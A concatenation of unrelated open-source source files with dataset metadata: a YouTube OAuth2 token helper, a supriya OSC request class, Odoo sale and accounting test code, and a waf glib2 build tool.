postData = self.CLIENT_ID + self.CLIENT_SECRET + '&refresh_token=%s&grant_type=refresh_token' % config.mediaportal.yt_refresh_token.value
d = twAgentGetPage(self.OAUTH2_URL+'/token', method='POST', postdata=postData, headers={'Content-Type': 'application/x-www-form-urlencoded'}).addCallback(self._cb_refresh, False).addErrback(self._cb_refresh)
return d
def _cb_refresh(self, data, error=True):
if error:
printl(_('Error: Unable to refresh token!'),self,'E')
return data
else:
try:
tokenData = json.loads(data)
self.accessToken = tokenData['access_token'].encode('utf-8')
self._expiresIn = tokenData['expires_in']
except:
printl('json data error!',self,'E')
return ""
else:
self._startRefreshTimer()
return self.accessToken
def revokeToken(self):
if config.mediaportal.yt_refresh_token.value:
twAgentGetPage(self.OAUTH2_URL+'/revoke?token=%s' % config.mediaportal.yt_refresh_token.value).addCallback(self._cb_revoke, False).addErrback(self._cb_revoke)
def _cb_revoke(self, data, error=True):
if error:
printl('Error: Unable to revoke!',self,'E')
def _startRefreshTimer(self):
if self._refreshTimer != None and self._refreshTimer.active():
self._refreshTimer.cancel()
self._refreshTimer = reactor.callLater(self._expiresIn - 10, self._tokenExpired)
def _tokenExpired(self):
if self._refreshTimer != None and self._refreshTimer.active():
self._refreshTimer.cancel()
self._expiresIn = 0
self.accessToken = None
def getAccessToken(self):
if self.accessToken == None:
return ""
else:
return self.accessToken
yt_oauth2 = YT_Oauth2() | gpl-2.0 | -8,659,979,360,545,974,000 | 35.764026 | 405 | 0.650682 | false |
Pulgama/supriya | supriya/commands/SynthDefLoadDirectoryRequest.py | 1 | 1591 | import pathlib
import supriya.osc
from supriya.commands.Request import Request
from supriya.commands.RequestBundle import RequestBundle
from supriya.enums import RequestId
class SynthDefLoadDirectoryRequest(Request):
"""
A /d_loadDir request.
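    Illustrative usage (a sketch; the first OSC slot is filled by
    RequestId.SYNTHDEF_LOAD_DIR and the given path is made absolute):
        SynthDefLoadDirectoryRequest(directory_path='synthdefs/').to_osc()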
"""
### CLASS VARIABLES ###
__slots__ = ("_callback", "_directory_path")
request_id = RequestId.SYNTHDEF_LOAD_DIR
### INITIALIZER ###
def __init__(self, callback=None, directory_path=None):
Request.__init__(self)
if callback is not None:
assert isinstance(callback, (Request, RequestBundle))
self._callback = callback
self._directory_path = pathlib.Path(directory_path).absolute()
### PUBLIC METHODS ###
def to_osc(self, *, with_placeholders=False, with_request_name=False):
if with_request_name:
request_id = self.request_name
else:
request_id = int(self.request_id)
contents = [request_id, str(self.directory_path)]
if self.callback:
contents.append(
self.callback.to_osc(
with_placeholders=with_placeholders,
with_request_name=with_request_name,
)
)
message = supriya.osc.OscMessage(*contents)
return message
### PUBLIC PROPERTIES ###
@property
def callback(self):
return self._callback
@property
def response_patterns(self):
return ["/done", "/d_loadDir"], None
@property
def directory_path(self):
return self._directory_path
| mit | 4,937,795,839,363,454,000 | 25.966102 | 74 | 0.607165 | false |
maxive/erp | addons/sale_order_dates/tests/test_expected_date.py | 2 | 4352 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from datetime import timedelta
from odoo import fields
from odoo.tests import common
class TestSaleExpectedDate(common.TransactionCase):
def test_sale_order_expected_date(self):
""" Test expected date and effective date of Sales Orders """
Product = self.env['product.product']
product_A = Product.create({
'name': 'Product A',
'type': 'product',
'sale_delay': 5,
'uom_id': 1,
})
product_B = Product.create({
'name': 'Product B',
'type': 'product',
'sale_delay': 10,
'uom_id': 1,
})
product_C = Product.create({
'name': 'Product C',
'type': 'product',
'sale_delay': 15,
'uom_id': 1,
})
self.env['stock.quant']._update_available_quantity(product_A, self.env.ref('stock.stock_location_stock'), 10)
self.env['stock.quant']._update_available_quantity(product_B, self.env.ref('stock.stock_location_stock'), 10)
self.env['stock.quant']._update_available_quantity(product_C, self.env.ref('stock.stock_location_stock'), 10)
sale_order = self.env['sale.order'].create({
'partner_id': self.ref('base.res_partner_3'),
'picking_policy': 'direct',
'order_line': [
(0, 0, {'name': product_A.name, 'product_id': product_A.id, 'customer_lead': product_A.sale_delay, 'product_uom_qty': 5}),
(0, 0, {'name': product_B.name, 'product_id': product_B.id, 'customer_lead': product_B.sale_delay, 'product_uom_qty': 5}),
(0, 0, {'name': product_C.name, 'product_id': product_C.id, 'customer_lead': product_C.sale_delay, 'product_uom_qty': 5})
],
})
        # if Shipping Policy is set to `direct` (when SO is in draft state) then expected date should be
        # current date + shortest lead time from all of its order lines
expected_date = fields.Datetime.to_string(fields.Datetime.from_string(fields.Datetime.now()) + timedelta(days=5))
self.assertEquals(expected_date, sale_order.expected_date, "Wrong expected date on sale order!")
        # if Shipping Policy is set to `one` (when SO is in draft state) then expected date should be
        # current date + longest lead time from all of its order lines
sale_order.write({'picking_policy': 'one'})
expected_date = fields.Datetime.to_string(fields.Datetime.from_string(fields.Datetime.now()) + timedelta(days=15))
self.assertEquals(expected_date, sale_order.expected_date, "Wrong expected date on sale order!")
sale_order.action_confirm()
# Setting confirmation date of SO to 5 days from today so that the expected/effective date could be checked
# against real confirmation date
confirm_date = fields.Datetime.from_string(fields.Datetime.now()) + timedelta(days=5)
sale_order.write({'confirmation_date': confirm_date})
        # if Shipping Policy is set to `one` (when SO is confirmed) then expected date should be
        # SO confirmation date + longest lead time from all of its order lines
expected_date = fields.Datetime.to_string(confirm_date + timedelta(days=15))
self.assertEquals(expected_date, sale_order.expected_date, "Wrong expected date on sale order!")
        # if Shipping Policy is set to `direct` (when SO is confirmed) then expected date should be
        # SO confirmation date + shortest lead time from all of its order lines
sale_order.write({'picking_policy': 'direct'})
expected_date = fields.Datetime.to_string(confirm_date + timedelta(days=5))
self.assertEquals(expected_date, sale_order.expected_date, "Wrong expected date on sale order!")
        # Check effective date: it should be the date on which the first shipment is successfully delivered to the customer
picking = sale_order.picking_ids[0]
for ml in picking.move_line_ids:
ml.qty_done = ml.product_uom_qty
picking.action_done()
self.assertEquals(picking.state, 'done', "Picking not processed correctly!")
self.assertEquals(fields.Date.today(), sale_order.effective_date, "Wrong effective date on sale order!")
| agpl-3.0 | -8,451,965,481,187,862,000 | 52.073171 | 138 | 0.637408 | false |
drayside/kodkod | libs/.waf-1.6.6-c57dd0fa119e23d36c23d598487c6880/waflib/Tools/glib2.py | 1 | 8301 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/svn/docs/wafbook/single.html#_obtaining_the_waf_file
import os
from waflib import Task,Utils,Options,Errors,Logs
from waflib.TaskGen import taskgen_method,before_method,after_method,feature
def add_marshal_file(self,filename,prefix):
if not hasattr(self,'marshal_list'):
self.marshal_list=[]
self.meths.append('process_marshal')
self.marshal_list.append((filename,prefix))
def process_marshal(self):
for f,prefix in getattr(self,'marshal_list',[]):
node=self.path.find_resource(f)
if not node:
raise Errors.WafError('file not found %r'%f)
h_node=node.change_ext('.h')
c_node=node.change_ext('.c')
task=self.create_task('glib_genmarshal',node,[h_node,c_node])
task.env.GLIB_GENMARSHAL_PREFIX=prefix
self.source=self.to_nodes(getattr(self,'source',[]))
self.source.append(c_node)
class glib_genmarshal(Task.Task):
def run(self):
bld=self.inputs[0].__class__.ctx
get=self.env.get_flat
cmd1="%s %s --prefix=%s --header > %s"%(get('GLIB_GENMARSHAL'),self.inputs[0].srcpath(),get('GLIB_GENMARSHAL_PREFIX'),self.outputs[0].abspath())
ret=bld.exec_command(cmd1)
if ret:return ret
c='''#include "%s"\n'''%self.outputs[0].name
self.outputs[1].write(c)
cmd2="%s %s --prefix=%s --body >> %s"%(get('GLIB_GENMARSHAL'),self.inputs[0].srcpath(),get('GLIB_GENMARSHAL_PREFIX'),self.outputs[1].abspath())
return bld.exec_command(cmd2)
vars=['GLIB_GENMARSHAL_PREFIX','GLIB_GENMARSHAL']
color='BLUE'
ext_out=['.h']
def add_enums_from_template(self,source='',target='',template='',comments=''):
if not hasattr(self,'enums_list'):
self.enums_list=[]
self.meths.append('process_enums')
self.enums_list.append({'source':source,'target':target,'template':template,'file-head':'','file-prod':'','file-tail':'','enum-prod':'','value-head':'','value-prod':'','value-tail':'','comments':comments})
def add_enums(self,source='',target='',file_head='',file_prod='',file_tail='',enum_prod='',value_head='',value_prod='',value_tail='',comments=''):
if not hasattr(self,'enums_list'):
self.enums_list=[]
self.meths.append('process_enums')
self.enums_list.append({'source':source,'template':'','target':target,'file-head':file_head,'file-prod':file_prod,'file-tail':file_tail,'enum-prod':enum_prod,'value-head':value_head,'value-prod':value_prod,'value-tail':value_tail,'comments':comments})
def process_enums(self):
for enum in getattr(self,'enums_list',[]):
task=self.create_task('glib_mkenums')
env=task.env
inputs=[]
source_list=self.to_list(enum['source'])
if not source_list:
raise Errors.WafError('missing source '+str(enum))
source_list=[self.path.find_resource(k)for k in source_list]
inputs+=source_list
env['GLIB_MKENUMS_SOURCE']=[k.abspath()for k in source_list]
if not enum['target']:
raise Errors.WafError('missing target '+str(enum))
tgt_node=self.path.find_or_declare(enum['target'])
if tgt_node.name.endswith('.c'):
self.source.append(tgt_node)
env['GLIB_MKENUMS_TARGET']=tgt_node.abspath()
options=[]
if enum['template']:
template_node=self.path.find_resource(enum['template'])
options.append('--template %s'%(template_node.abspath()))
inputs.append(template_node)
params={'file-head':'--fhead','file-prod':'--fprod','file-tail':'--ftail','enum-prod':'--eprod','value-head':'--vhead','value-prod':'--vprod','value-tail':'--vtail','comments':'--comments'}
for param,option in params.items():
if enum[param]:
options.append('%s %r'%(option,enum[param]))
env['GLIB_MKENUMS_OPTIONS']=' '.join(options)
task.set_inputs(inputs)
task.set_outputs(tgt_node)
class glib_mkenums(Task.Task):
run_str='${GLIB_MKENUMS} ${GLIB_MKENUMS_OPTIONS} ${GLIB_MKENUMS_SOURCE} > ${GLIB_MKENUMS_TARGET}'
color='PINK'
ext_out=['.h']
def add_settings_schemas(self,filename_list):
if not hasattr(self,'settings_schema_files'):
self.settings_schema_files=[]
if not isinstance(filename_list,list):
filename_list=[filename_list]
self.settings_schema_files.extend(filename_list)
def add_settings_enums(self,namespace,filename_list):
if hasattr(self,'settings_enum_namespace'):
raise Errors.WafError("Tried to add gsettings enums to '%s' more than once"%self.name)
self.settings_enum_namespace=namespace
if type(filename_list)!='list':
filename_list=[filename_list]
self.settings_enum_files=filename_list
def r_change_ext(self,ext):
name=self.name
k=name.rfind('.')
if k>=0:
name=name[:k]+ext
else:
name=name+ext
return self.parent.find_or_declare([name])
def process_settings(self):
enums_tgt_node=[]
install_files=[]
settings_schema_files=getattr(self,'settings_schema_files',[])
if settings_schema_files and not self.env['GLIB_COMPILE_SCHEMAS']:
raise Errors.WafError("Unable to process GSettings schemas - glib-compile-schemas was not found during configure")
if hasattr(self,'settings_enum_files'):
enums_task=self.create_task('glib_mkenums')
source_list=self.settings_enum_files
source_list=[self.path.find_resource(k)for k in source_list]
enums_task.set_inputs(source_list)
enums_task.env['GLIB_MKENUMS_SOURCE']=[k.abspath()for k in source_list]
target=self.settings_enum_namespace+'.enums.xml'
tgt_node=self.path.find_or_declare(target)
enums_task.set_outputs(tgt_node)
enums_task.env['GLIB_MKENUMS_TARGET']=tgt_node.abspath()
enums_tgt_node=[tgt_node]
install_files.append(target)
options='--comments "<!-- @comment@ -->" --fhead "<schemalist>" --vhead " <@type@ id=\\"%s.@EnumName@\\">" --vprod " <value nick=\\"@valuenick@\\" value=\\"@valuenum@\\"/>" --vtail " </@type@>" --ftail "</schemalist>" '%(self.settings_enum_namespace)
enums_task.env['GLIB_MKENUMS_OPTIONS']=options
for schema in settings_schema_files:
schema_task=self.create_task('glib_validate_schema')
install_files.append(schema)
schema_node=self.path.find_resource(schema)
if not schema_node:
raise Errors.WafError("Cannot find the schema file '%s'"%schema)
source_list=enums_tgt_node+[schema_node]
schema_task.set_inputs(source_list)
schema_task.env['GLIB_COMPILE_SCHEMAS_OPTIONS']=[("--schema-file="+k.abspath())for k in source_list]
target_node=r_change_ext(schema_node,'.xml.valid')
schema_task.set_outputs(target_node)
schema_task.env['GLIB_VALIDATE_SCHEMA_OUTPUT']=target_node.abspath()
def compile_schemas_callback(bld):
if not bld.is_install:return
Logs.pprint('YELLOW','Updating GSettings schema cache')
command=Utils.subst_vars("${GLIB_COMPILE_SCHEMAS} ${GSETTINGSSCHEMADIR}",bld.env)
ret=self.bld.exec_command(command)
if self.bld.is_install:
if not self.env['GSETTINGSSCHEMADIR']:
raise Errors.WafError('GSETTINGSSCHEMADIR not defined (should have been set up automatically during configure)')
if install_files:
self.bld.install_files(self.env['GSETTINGSSCHEMADIR'],install_files)
if not hasattr(self.bld,'_compile_schemas_registered'):
self.bld.add_post_fun(compile_schemas_callback)
self.bld._compile_schemas_registered=True
class glib_validate_schema(Task.Task):
run_str='rm -f ${GLIB_VALIDATE_SCHEMA_OUTPUT} && ${GLIB_COMPILE_SCHEMAS} --dry-run ${GLIB_COMPILE_SCHEMAS_OPTIONS} && touch ${GLIB_VALIDATE_SCHEMA_OUTPUT}'
color='PINK'
def configure(conf):
conf.find_program('glib-genmarshal',var='GLIB_GENMARSHAL')
conf.find_perl_program('glib-mkenums',var='GLIB_MKENUMS')
conf.find_program('glib-compile-schemas',var='GLIB_COMPILE_SCHEMAS',mandatory=False)
def getstr(varname):
return getattr(Options.options,varname,getattr(conf.env,varname,''))
gsettingsschemadir=getstr('GSETTINGSSCHEMADIR')
if not gsettingsschemadir:
datadir=getstr('DATADIR')
if not datadir:
prefix=conf.env['PREFIX']
datadir=os.path.join(prefix,'share')
gsettingsschemadir=os.path.join(datadir,'glib-2.0','schemas')
conf.env['GSETTINGSSCHEMADIR']=gsettingsschemadir
def options(opt):
opt.add_option('--gsettingsschemadir',help='GSettings schema location [Default: ${datadir}/glib-2.0/schemas]',default='',dest='GSETTINGSSCHEMADIR')
taskgen_method(add_marshal_file)
before_method('process_source')(process_marshal)
taskgen_method(add_enums_from_template)
taskgen_method(add_enums)
before_method('process_source')(process_enums)
taskgen_method(add_settings_schemas)
taskgen_method(add_settings_enums)
feature('glib2')(process_settings) | mit | 2,504,423,353,258,335,700 | 46.712644 | 257 | 0.720757 | false |
pepetreshere/odoo | addons/account/tests/common.py | 1 | 31193 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import fields
from odoo.tests.common import SavepointCase, HttpSavepointCase, tagged, Form
import time
import base64
from lxml import etree
@tagged('post_install', '-at_install')
class AccountTestInvoicingCommon(SavepointCase):
@classmethod
def copy_account(cls, account):
suffix_nb = 1
while True:
new_code = '%s (%s)' % (account.code, suffix_nb)
if account.search_count([('company_id', '=', account.company_id.id), ('code', '=', new_code)]):
suffix_nb += 1
else:
return account.copy(default={'code': new_code})
@classmethod
def setUpClass(cls, chart_template_ref=None):
super(AccountTestInvoicingCommon, cls).setUpClass()
if chart_template_ref:
chart_template = cls.env.ref(chart_template_ref)
else:
chart_template = cls.env.ref('l10n_generic_coa.configurable_chart_template', raise_if_not_found=False)
if not chart_template:
cls.tearDownClass()
# skipTest raises exception
cls.skipTest(cls, "Accounting Tests skipped because the user's company has no chart of accounts.")
# Create user.
user = cls.env['res.users'].create({
'name': 'Because I am accountman!',
'login': 'accountman',
'password': 'accountman',
'groups_id': [(6, 0, cls.env.user.groups_id.ids), (4, cls.env.ref('account.group_account_user').id)],
})
user.partner_id.email = 'accountman@test.com'
# Shadow the current environment/cursor with one having the report user.
# This is mandatory to test access rights.
cls.env = cls.env(user=user)
cls.cr = cls.env.cr
cls.company_data_2 = cls.setup_company_data('company_2_data', chart_template=chart_template)
cls.company_data = cls.setup_company_data('company_1_data', chart_template=chart_template)
user.write({
'company_ids': [(6, 0, (cls.company_data['company'] + cls.company_data_2['company']).ids)],
'company_id': cls.company_data['company'].id,
})
cls.currency_data = cls.setup_multi_currency_data()
# ==== Taxes ====
cls.tax_sale_a = cls.company_data['default_tax_sale']
cls.tax_sale_b = cls.company_data['default_tax_sale'].copy()
cls.tax_purchase_a = cls.company_data['default_tax_purchase']
cls.tax_purchase_b = cls.company_data['default_tax_purchase'].copy()
cls.tax_armageddon = cls.setup_armageddon_tax('complex_tax', cls.company_data)
# ==== Products ====
cls.product_a = cls.env['product.product'].create({
'name': 'product_a',
'uom_id': cls.env.ref('uom.product_uom_unit').id,
'lst_price': 1000.0,
'standard_price': 800.0,
'property_account_income_id': cls.company_data['default_account_revenue'].id,
'property_account_expense_id': cls.company_data['default_account_expense'].id,
'taxes_id': [(6, 0, cls.tax_sale_a.ids)],
'supplier_taxes_id': [(6, 0, cls.tax_purchase_a.ids)],
})
cls.product_b = cls.env['product.product'].create({
'name': 'product_b',
'uom_id': cls.env.ref('uom.product_uom_dozen').id,
'lst_price': 200.0,
'standard_price': 160.0,
'property_account_income_id': cls.copy_account(cls.company_data['default_account_revenue']).id,
'property_account_expense_id': cls.copy_account(cls.company_data['default_account_expense']).id,
'taxes_id': [(6, 0, (cls.tax_sale_a + cls.tax_sale_b).ids)],
'supplier_taxes_id': [(6, 0, (cls.tax_purchase_a + cls.tax_purchase_b).ids)],
})
# ==== Fiscal positions ====
cls.fiscal_pos_a = cls.env['account.fiscal.position'].create({
'name': 'fiscal_pos_a',
'tax_ids': [
(0, None, {
'tax_src_id': cls.tax_sale_a.id,
'tax_dest_id': cls.tax_sale_b.id,
}),
(0, None, {
'tax_src_id': cls.tax_purchase_a.id,
'tax_dest_id': cls.tax_purchase_b.id,
}),
],
'account_ids': [
(0, None, {
'account_src_id': cls.product_a.property_account_income_id.id,
'account_dest_id': cls.product_b.property_account_income_id.id,
}),
(0, None, {
'account_src_id': cls.product_a.property_account_expense_id.id,
'account_dest_id': cls.product_b.property_account_expense_id.id,
}),
],
})
# ==== Payment terms ====
cls.pay_terms_a = cls.env.ref('account.account_payment_term_immediate')
cls.pay_terms_b = cls.env['account.payment.term'].create({
'name': '30% Advance End of Following Month',
'note': 'Payment terms: 30% Advance End of Following Month',
'line_ids': [
(0, 0, {
'value': 'percent',
'value_amount': 30.0,
'sequence': 400,
'days': 0,
'option': 'day_after_invoice_date',
}),
(0, 0, {
'value': 'balance',
'value_amount': 0.0,
'sequence': 500,
'days': 31,
'option': 'day_following_month',
}),
],
})
# ==== Partners ====
cls.partner_a = cls.env['res.partner'].create({
'name': 'partner_a',
'property_payment_term_id': cls.pay_terms_a.id,
'property_supplier_payment_term_id': cls.pay_terms_a.id,
'property_account_receivable_id': cls.company_data['default_account_receivable'].id,
'property_account_payable_id': cls.company_data['default_account_payable'].id,
'company_id': False,
})
cls.partner_b = cls.env['res.partner'].create({
'name': 'partner_b',
'property_payment_term_id': cls.pay_terms_b.id,
'property_supplier_payment_term_id': cls.pay_terms_b.id,
'property_account_position_id': cls.fiscal_pos_a.id,
'property_account_receivable_id': cls.company_data['default_account_receivable'].copy().id,
'property_account_payable_id': cls.company_data['default_account_payable'].copy().id,
'company_id': False,
})
# ==== Cash rounding ====
cls.cash_rounding_a = cls.env['account.cash.rounding'].create({
'name': 'add_invoice_line',
'rounding': 0.05,
'strategy': 'add_invoice_line',
'profit_account_id': cls.company_data['default_account_revenue'].copy().id,
'loss_account_id': cls.company_data['default_account_expense'].copy().id,
'rounding_method': 'UP',
})
cls.cash_rounding_b = cls.env['account.cash.rounding'].create({
'name': 'biggest_tax',
'rounding': 0.05,
'strategy': 'biggest_tax',
'rounding_method': 'DOWN',
})
@classmethod
def setup_company_data(cls, company_name, chart_template=None, **kwargs):
''' Create a new company having the name passed as parameter.
A chart of accounts will be installed to this company: the same as the current company one.
The current user will get access to this company.
:param chart_template: The chart template to be used on this new company.
:param company_name: The name of the company.
:return: A dictionary will be returned containing all relevant accounting data for testing.
'''
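        # Illustrative call, mirroring setUpClass above (names refer to keys of the
        # returned dictionary):
        #     cls.company_data = cls.setup_company_data('company_1_data')
        #     journal = cls.company_data['default_journal_sale']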
def search_account(company, chart_template, field_name, domain):
template_code = chart_template[field_name].code
domain = [('company_id', '=', company.id)] + domain
account = None
if template_code:
account = cls.env['account.account'].search(domain + [('code', '=like', template_code + '%')], limit=1)
if not account:
account = cls.env['account.account'].search(domain, limit=1)
return account
chart_template = chart_template or cls.env.company.chart_template_id
company = cls.env['res.company'].create({
'name': company_name,
**kwargs,
})
cls.env.user.company_ids |= company
chart_template.try_loading(company=company)
# The currency could be different after the installation of the chart template.
if kwargs.get('currency_id'):
company.write({'currency_id': kwargs['currency_id']})
return {
'company': company,
'currency': company.currency_id,
'default_account_revenue': cls.env['account.account'].search([
('company_id', '=', company.id),
('user_type_id', '=', cls.env.ref('account.data_account_type_revenue').id)
], limit=1),
'default_account_expense': cls.env['account.account'].search([
('company_id', '=', company.id),
('user_type_id', '=', cls.env.ref('account.data_account_type_expenses').id)
], limit=1),
'default_account_receivable': search_account(company, chart_template, 'property_account_receivable_id', [
('user_type_id.type', '=', 'receivable')
]),
'default_account_payable': cls.env['account.account'].search([
('company_id', '=', company.id),
('user_type_id.type', '=', 'payable')
], limit=1),
'default_account_assets': cls.env['account.account'].search([
('company_id', '=', company.id),
('user_type_id', '=', cls.env.ref('account.data_account_type_current_assets').id)
], limit=1),
'default_account_tax_sale': company.account_sale_tax_id.mapped('invoice_repartition_line_ids.account_id'),
'default_account_tax_purchase': company.account_purchase_tax_id.mapped('invoice_repartition_line_ids.account_id'),
'default_journal_misc': cls.env['account.journal'].search([
('company_id', '=', company.id),
('type', '=', 'general')
], limit=1),
'default_journal_sale': cls.env['account.journal'].search([
('company_id', '=', company.id),
('type', '=', 'sale')
], limit=1),
'default_journal_purchase': cls.env['account.journal'].search([
('company_id', '=', company.id),
('type', '=', 'purchase')
], limit=1),
'default_journal_bank': cls.env['account.journal'].search([
('company_id', '=', company.id),
('type', '=', 'bank')
], limit=1),
'default_journal_cash': cls.env['account.journal'].search([
('company_id', '=', company.id),
('type', '=', 'cash')
], limit=1),
'default_tax_sale': company.account_sale_tax_id,
'default_tax_purchase': company.account_purchase_tax_id,
}
@classmethod
def setup_multi_currency_data(cls, default_values={}, rate2016=3.0, rate2017=2.0):
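        # Creates a fictional "Gold Coin" currency plus two exchange rates against
        # the company currency: `rate2016` applies from 2016-01-01 and `rate2017`
        # from 2017-01-01 (3.0 and 2.0 by default).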
foreign_currency = cls.env['res.currency'].create({
'name': 'Gold Coin',
'symbol': '☺',
'rounding': 0.001,
'position': 'after',
'currency_unit_label': 'Gold',
'currency_subunit_label': 'Silver',
**default_values,
})
rate1 = cls.env['res.currency.rate'].create({
'name': '2016-01-01',
'rate': rate2016,
'currency_id': foreign_currency.id,
'company_id': cls.env.company.id,
})
rate2 = cls.env['res.currency.rate'].create({
'name': '2017-01-01',
'rate': rate2017,
'currency_id': foreign_currency.id,
'company_id': cls.env.company.id,
})
return {
'currency': foreign_currency,
'rates': rate1 + rate2,
}
@classmethod
def setup_armageddon_tax(cls, tax_name, company_data):
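        # Builds a deliberately convoluted 'group' tax: a 20% price-included child
        # exigible on invoice with a 40/60 tax repartition split (one line without
        # an account), plus a 10% cash-basis child exigible on payment.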
return cls.env['account.tax'].create({
'name': '%s (group)' % tax_name,
'amount_type': 'group',
'amount': 0.0,
'children_tax_ids': [
(0, 0, {
'name': '%s (child 1)' % tax_name,
'amount_type': 'percent',
'amount': 20.0,
'price_include': True,
'include_base_amount': True,
'tax_exigibility': 'on_invoice',
'invoice_repartition_line_ids': [
(0, 0, {
'factor_percent': 100,
'repartition_type': 'base',
}),
(0, 0, {
'factor_percent': 40,
'repartition_type': 'tax',
'account_id': company_data['default_account_tax_sale'].id,
}),
(0, 0, {
'factor_percent': 60,
'repartition_type': 'tax',
# /!\ No account set.
}),
],
'refund_repartition_line_ids': [
(0, 0, {
'factor_percent': 100,
'repartition_type': 'base',
}),
(0, 0, {
'factor_percent': 40,
'repartition_type': 'tax',
'account_id': company_data['default_account_tax_sale'].id,
}),
(0, 0, {
'factor_percent': 60,
'repartition_type': 'tax',
# /!\ No account set.
}),
],
}),
(0, 0, {
'name': '%s (child 2)' % tax_name,
'amount_type': 'percent',
'amount': 10.0,
'tax_exigibility': 'on_payment',
'cash_basis_transition_account_id': company_data['default_account_tax_sale'].copy().id,
'invoice_repartition_line_ids': [
(0, 0, {
'factor_percent': 100,
'repartition_type': 'base',
}),
(0, 0, {
'factor_percent': 100,
'repartition_type': 'tax',
'account_id': company_data['default_account_tax_sale'].id,
}),
],
'refund_repartition_line_ids': [
(0, 0, {
'factor_percent': 100,
'repartition_type': 'base',
}),
(0, 0, {
'factor_percent': 100,
'repartition_type': 'tax',
'account_id': company_data['default_account_tax_sale'].id,
}),
],
}),
],
})
@classmethod
def init_invoice(cls, move_type, partner=None, invoice_date=None, post=False, products=[], amounts=[], taxes=None):
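        # Builds an invoice through the Form emulator: one line per record in
        # `products`, one extra line per value in `amounts`, optionally replacing
        # the default taxes with `taxes` and posting the move when `post` is True.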
move_form = Form(cls.env['account.move'].with_context(default_move_type=move_type))
move_form.invoice_date = invoice_date or fields.Date.from_string('2019-01-01')
move_form.partner_id = partner or cls.partner_a
for product in products:
with move_form.invoice_line_ids.new() as line_form:
line_form.product_id = product
if taxes:
line_form.tax_ids.clear()
line_form.tax_ids.add(taxes)
for amount in amounts:
with move_form.invoice_line_ids.new() as line_form:
line_form.price_unit = amount
if taxes:
line_form.tax_ids.clear()
line_form.tax_ids.add(taxes)
rslt = move_form.save()
if post:
rslt.action_post()
return rslt
def assertInvoiceValues(self, move, expected_lines_values, expected_move_values):
def sort_lines(lines):
return lines.sorted(lambda line: (line.exclude_from_invoice_tab, not bool(line.tax_line_id), line.name or '', line.balance))
self.assertRecordValues(sort_lines(move.line_ids.sorted()), expected_lines_values)
self.assertRecordValues(sort_lines(move.invoice_line_ids.sorted()), expected_lines_values[:len(move.invoice_line_ids)])
self.assertRecordValues(move, [expected_move_values])
####################################################
# Xml Comparison
####################################################
def _turn_node_as_dict_hierarchy(self, node):
''' Turn the node as a python dictionary to be compared later with another one.
Allow to ignore the management of namespaces.
:param node: A node inside an xml tree.
:return: A python dictionary.
'''
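        # Example shape for a hypothetical node <ID currencyID="EUR">42</ID>:
        #     {'tag': 'ID', 'namespace': None, 'text': '42',
        #      'attrib': {'currencyID': 'EUR'}, 'children': []}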
tag_split = node.tag.split('}')
tag_wo_ns = tag_split[-1]
attrib_wo_ns = {k: v for k, v in node.attrib.items() if '}' not in k}
return {
'tag': tag_wo_ns,
'namespace': None if len(tag_split) < 2 else tag_split[0],
'text': (node.text or '').strip(),
'attrib': attrib_wo_ns,
'children': [self._turn_node_as_dict_hierarchy(child_node) for child_node in node.getchildren()],
}
def assertXmlTreeEqual(self, xml_tree, expected_xml_tree):
''' Compare two lxml.etree.
:param xml_tree: The current tree.
:param expected_xml_tree: The expected tree.
'''
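        # Conventions used by the comparison below: an expected attribute or text
        # value of '___ignore___' matches anything, while an expected attribute
        # value of '___remove___' asserts that the attribute is absent.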
def assertNodeDictEqual(node_dict, expected_node_dict):
''' Compare nodes created by the `_turn_node_as_dict_hierarchy` method.
:param node_dict: The node to compare with.
:param expected_node_dict: The expected node.
'''
# Check tag.
self.assertEqual(node_dict['tag'], expected_node_dict['tag'])
# Check attributes.
node_dict_attrib = {k: '___ignore___' if expected_node_dict['attrib'].get(k) == '___ignore___' else v
for k, v in node_dict['attrib'].items()}
expected_node_dict_attrib = {k: v for k, v in expected_node_dict['attrib'].items() if v != '___remove___'}
self.assertDictEqual(
node_dict_attrib,
expected_node_dict_attrib,
"Element attributes are different for node %s" % node_dict['tag'],
)
# Check text.
if expected_node_dict['text'] != '___ignore___':
self.assertEqual(
node_dict['text'],
expected_node_dict['text'],
"Element text are different for node %s" % node_dict['tag'],
)
# Check children.
self.assertEqual(
[child['tag'] for child in node_dict['children']],
[child['tag'] for child in expected_node_dict['children']],
"Number of children elements for node %s is different." % node_dict['tag'],
)
for child_node_dict, expected_child_node_dict in zip(node_dict['children'], expected_node_dict['children']):
assertNodeDictEqual(child_node_dict, expected_child_node_dict)
assertNodeDictEqual(
self._turn_node_as_dict_hierarchy(xml_tree),
self._turn_node_as_dict_hierarchy(expected_xml_tree),
)
def with_applied_xpath(self, xml_tree, xpath):
''' Applies the xpath to the xml_tree passed as parameter.
:param xml_tree: An instance of etree.
:param xpath: The xpath to apply as a string.
:return: The resulting etree after applying the xpaths.
'''
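        # Illustrative xpath string (the element name is hypothetical):
        #     self.with_applied_xpath(tree, "<xpath expr='//PaymentMeans' position='replace'/>")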
diff_xml_tree = etree.fromstring('<data>%s</data>' % xpath)
return self.env['ir.ui.view'].apply_inheritance_specs(xml_tree, diff_xml_tree)
def get_xml_tree_from_attachment(self, attachment):
''' Extract an instance of etree from an ir.attachment.
:param attachment: An ir.attachment.
:return: An instance of etree.
'''
return etree.fromstring(base64.b64decode(attachment.with_context(bin_size=False).datas))
def get_xml_tree_from_string(self, xml_tree_str):
''' Convert the string passed as parameter to an instance of etree.
:param xml_tree_str: A string representing an xml.
:return: An instance of etree.
'''
return etree.fromstring(xml_tree_str)
@tagged('post_install', '-at_install')
class AccountTestInvoicingHttpCommon(AccountTestInvoicingCommon, HttpSavepointCase):
pass
class TestAccountReconciliationCommon(AccountTestInvoicingCommon):
"""Tests for reconciliation (account.tax)
Test used to check that when doing a sale or purchase invoice in a different currency,
the result will be balanced.
"""
@classmethod
def setUpClass(cls, chart_template_ref=None):
super().setUpClass(chart_template_ref=chart_template_ref)
cls.company = cls.company_data['company']
cls.company.currency_id = cls.env.ref('base.EUR')
cls.partner_agrolait = cls.env['res.partner'].create({
'name': 'Deco Addict',
'is_company': True,
'country_id': cls.env.ref('base.us').id,
})
cls.partner_agrolait_id = cls.partner_agrolait.id
cls.currency_swiss_id = cls.env.ref("base.CHF").id
cls.currency_usd_id = cls.env.ref("base.USD").id
cls.currency_euro_id = cls.env.ref("base.EUR").id
cls.account_rcv = cls.company_data['default_account_receivable']
